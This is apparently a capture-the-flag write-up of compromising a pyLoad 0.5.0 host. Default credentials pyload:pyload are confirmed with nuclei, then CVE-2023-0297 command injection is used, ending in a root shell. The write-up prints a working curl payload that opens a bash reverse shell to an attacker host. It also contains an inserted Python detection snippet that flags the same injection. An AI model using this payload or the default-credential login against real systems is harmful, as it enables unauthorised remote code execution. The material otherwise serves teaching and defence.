Enumeration

Nmap

The initial nmap scan revealed that SSH and port 9666 were open.

00 - nmap

Web Enumeration

Visiting the website revealed that it was a pyLoad site.

01 - web

After some research I found that pyLoad ships with the default credentials pyload:pyload. There was also a nuclei template for it.

02 - default creds

I ran nuclei and confirmed that it was indeed using the default credentials.

02 - default creds with nuclei

Visiting the info page revealed that pyLoad 0.5.0 was running.

03 - pyload version

Exploit to Root

CVE-2023-0297

Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.

This version was vulnerable to RCE through command injection. After some research I found that all that is needed is a curl command like the one below:

curl -i -s -k -X POST --data-binary "jk=pyimport%20os;os.system(\"bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F${LHOST}%2F${LPORT}%200%3E%261%27\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa"  "${WEBHOST}/flash/addcrypted2"
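As an added defensive example (not part of the original writeup or the pyLoad project), the check below shows how a reverse proxy or WAF rule could flag the payload shape above: POST requests to /flash/addcrypted2 whose jk field carries pyimport, which is js2py's bridge into Python and never appears in a legitimate JavaScript key function. The sample request list is constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Constructed sample requests (method, path, form body) as a reverse proxy or
# WAF in front of pyLoad might record them. Not real traffic.
SAMPLE_REQUESTS = [
    # Benign shape: jk is plain JavaScript defining the key function.
    ("POST", "/flash/addcrypted2",
     "jk=function%20f(){return%20%2248%22};&package=test&crypted=AAAA&passwords=aaaa"),
    # CVE-2023-0297 shape from the writeup: jk smuggles 'pyimport' into js2py.
    ("POST", "/flash/addcrypted2",
     "jk=pyimport%20os;os.system(%22id%22);f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa"),
    # Unrelated endpoint: not inspected.
    ("GET", "/login", ""),
]

# 'pyimport' is js2py's bridge from JavaScript into Python; a legitimate
# jk value is pure JavaScript and never needs it.
INJECTION_MARKERS = re.compile(r"\bpyimport\b|\bos\.system\b", re.IGNORECASE)

def classify_request(method, path, body):
    """Return 'alert', 'ok' or 'ignore' for a single request."""
    if method != "POST" or path != "/flash/addcrypted2":
        return "ignore"
    # parse_qs percent-decodes values, so %20 and %22 become ' ' and '"'.
    params = parse_qs(body, keep_blank_values=True)
    jk = params.get("jk", [""])[0]
    return "alert" if INJECTION_MARKERS.search(jk) else "ok"

def scan(requests):
    """Classify every request; returns a list aligned with the input."""
    return [classify_request(*req) for req in requests]

if __name__ == "__main__":
    for req, verdict in zip(SAMPLE_REQUESTS, scan(SAMPLE_REQUESTS)):
        print(f"{verdict:6} {req[0]} {req[1]}")
```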

However, there was already a public repo for it (overgrowncarrot1/CVE-2023-0297), so I ran that instead.

04 - github

05 - exp

Running it got me a root shell.

06 - gg
